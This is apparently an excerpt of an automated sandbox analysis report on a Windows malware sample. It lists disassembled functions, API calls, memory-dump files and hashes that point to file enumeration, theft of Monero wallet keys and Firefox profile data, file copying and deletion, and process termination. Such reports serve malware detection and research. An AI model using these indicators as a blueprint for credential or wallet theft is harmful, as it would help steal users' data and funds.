                            • Opcode ID: 2855975e62d0bd74e38a224e611232480b496f69faa0d694e4cb6655d3ff488b
                            • Instruction ID: b1b8fbf8e4c30dec0debba494c072885103a1def695867c20d0f036dc3df91b9
                            • Opcode Fuzzy Hash: 2855975e62d0bd74e38a224e611232480b496f69faa0d694e4cb6655d3ff488b
                            • Instruction Fuzzy Hash: 1E5169B15402189BCB24EB70DD49FEDB37CAB58305F405998F61AA6184DB749BC8CF91
                            Function 00E540F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 00E54113
                            • FindFirstFileA.KERNEL32(?,?), ref: 00E5412A
                            • StrCmpCA.SHLWAPI(?,00E60F94), ref: 00E54158
                            • StrCmpCA.SHLWAPI(?,00E60F98), ref: 00E5416E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E542BC
                            • FindClose.KERNEL32(000000FF), ref: 00E542D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: c212e3e4a43508983f8b7d4c5dbd86ca37e020498f905123406dabe82988d14c
                            • Instruction ID: 7b0e798350f403ac64b982471341396fd505cd991d0d2a8de4532f30b2cae7f2
                            • Opcode Fuzzy Hash: c212e3e4a43508983f8b7d4c5dbd86ca37e020498f905123406dabe82988d14c
                            • Instruction Fuzzy Hash: D1515BB5500218ABCB24EBB0DD45EEAB37CBB58305F4049D8F61AA6184DB759BC9CF50
                            Function 00E4EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 00E4EE3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 00E4EE55
                            • StrCmpCA.SHLWAPI(?,00E61630), ref: 00E4EEAB
                            • StrCmpCA.SHLWAPI(?,00E61634), ref: 00E4EEC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4F3AE
                            • FindClose.KERNEL32(000000FF), ref: 00E4F3C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: 5b44df8be7ad51b797a62ae27d19d656c7bbd4d0c330a2f1be677fb50ecce461
                            • Instruction ID: cb85f6a7e28a57833ec97aa4f264399314b0986806533551c5182c8e4d815aee
                            • Opcode Fuzzy Hash: 5b44df8be7ad51b797a62ae27d19d656c7bbd4d0c330a2f1be677fb50ecce461
                            • Instruction Fuzzy Hash: AFE130729111189BDB54FB60DC62EEE7379AF54301F445AE9F80A72092EE306B8DCF91
                            Function 00E80098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                            • API String ID: 0-1562099544
                            • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                            • Instruction ID: 6227cc90db829e050880fe4712cd3b440a472f6d6f911fc65cbd049675246695
                            • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                            • Instruction Fuzzy Hash: 58E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                            Function 00E4F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E616B0,00E60D97), ref: 00E4F81E
                            • StrCmpCA.SHLWAPI(?,00E616B4), ref: 00E4F86F
                            • StrCmpCA.SHLWAPI(?,00E616B8), ref: 00E4F885
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4FBB1
                            • FindClose.KERNEL32(000000FF), ref: 00E4FBC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: 9b94e0ec74765e20de383137830ad7673350ca926ba4a0113ca79a8befd5f2e3
                            • Instruction ID: 42a983b993422a7be22bbf4fd81fef098a4b9dffa40fd044ee61a83676d1150e
                            • Opcode Fuzzy Hash: 9b94e0ec74765e20de383137830ad7673350ca926ba4a0113ca79a8befd5f2e3
                            • Instruction Fuzzy Hash: CCB113719001189BCB24FF64DD96EEE73B9AF54301F045AB8E90A76191EF309B4CCB92
                            Function 00E41710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E6523C,?,?,?,00E652E4,?,?,00000000,?,00000000), ref: 00E41963
                            • StrCmpCA.SHLWAPI(?,00E6538C), ref: 00E419B3
                            • StrCmpCA.SHLWAPI(?,00E65434), ref: 00E419C9
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E41D80
                            • DeleteFileA.KERNEL32(00000000), ref: 00E41E0A
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E41E60
                            • FindClose.KERNEL32(000000FF), ref: 00E41E72
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: 2fed91634049c3095efd1517702299088426ad8ead7908527e38368b6ba2e975
                            • Instruction ID: 08979b04148d7ac71603b67b5a444de512062698e792192568b5d475a162459a
                            • Opcode Fuzzy Hash: 2fed91634049c3095efd1517702299088426ad8ead7908527e38368b6ba2e975
                            • Instruction Fuzzy Hash: 9512F0719101189BCF59FB60DC66AEEB3B9AF54301F445AE9E90672091EF306B8CCF91
                            Function 00E4DF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E60C32), ref: 00E4DF5E
                            • StrCmpCA.SHLWAPI(?,00E615C0), ref: 00E4DFAE
                            • StrCmpCA.SHLWAPI(?,00E615C4), ref: 00E4DFC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4E4E0
                            • FindClose.KERNEL32(000000FF), ref: 00E4E4F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: fed9bd99313b22fb74b15341204e5230f246d8fc4635eff6376475e79692d024
                            • Instruction ID: 8c5fdac425f6e6e1d3ba08bf9dffc4ad7b0d4e098857a8dcaafd899d272a1501
                            • Opcode Fuzzy Hash: fed9bd99313b22fb74b15341204e5230f246d8fc4635eff6376475e79692d024
                            • Instruction Fuzzy Hash: 3BF1EF719101189BCB65FB60DDA5EEEB379AF14301F446AE9E41A72091EF306B8CCF91
                            Function 00E4DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E615A8,00E60BAF), ref: 00E4DBEB
                            • StrCmpCA.SHLWAPI(?,00E615AC), ref: 00E4DC33
                            • StrCmpCA.SHLWAPI(?,00E615B0), ref: 00E4DC49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4DECC
                            • FindClose.KERNEL32(000000FF), ref: 00E4DEDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 20ba047c9c8bb3c5f7114977cd2892c2b9e2b0d4194f101255b5d54a5e45258b
                            • Instruction ID: 3ef204cb27321ce4e455dc4a1806b00062e4edc8023ff43bfef05f5b436ff57c
                            • Opcode Fuzzy Hash: 20ba047c9c8bb3c5f7114977cd2892c2b9e2b0d4194f101255b5d54a5e45258b
                            • Instruction Fuzzy Hash: 98912172A001089BCB14FB70ED969ED73BDAB94341F045AB8FD1676185EE349B4CCB92
                            Function 00E598E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E59905
                            • Process32First.KERNEL32(00E49FDE,00000128), ref: 00E59919
                            • Process32Next.KERNEL32(00E49FDE,00000128), ref: 00E5992E
                            • StrCmpCA.SHLWAPI(?,00E49FDE), ref: 00E59943
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E5995C
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E5997A
                            • CloseHandle.KERNEL32(00000000), ref: 00E59987
                            • CloseHandle.KERNEL32(00E49FDE), ref: 00E59993
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 2696918072-0
                            • Opcode ID: 4a32e95e5d09b74466dd09cb3b83deb0c98339d898ec238c12f64980e774ff59
                            • Instruction ID: 7e8c7d16f550cc524168eda240ddc2e6b9ac965c0dabbdcff8252862a637b924
                            • Opcode Fuzzy Hash: 4a32e95e5d09b74466dd09cb3b83deb0c98339d898ec238c12f64980e774ff59
                            • Instruction Fuzzy Hash: D211EC75A00218EBDB24DFA4DD48BDDF7B9AB88705F00459CF519A6284DB749A84CF90
                            Function 012B5551 Relevance: 11.6, Strings: 8, Instructions: 1642COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: o}{$ ik$3>N\$S51;$[7bc$o?=$6}$['
                            • API String ID: 0-2791657503
                            • Opcode ID: fc49d410093f98705597b359761f045e7e60018b2e8bbcf6b4270de14057f0d3
                            • Instruction ID: fa1a2111647f537cc450412a17d5e6e3a3954e7ee12d7c8c6fc4e54300f73485
                            • Opcode Fuzzy Hash: fc49d410093f98705597b359761f045e7e60018b2e8bbcf6b4270de14057f0d3
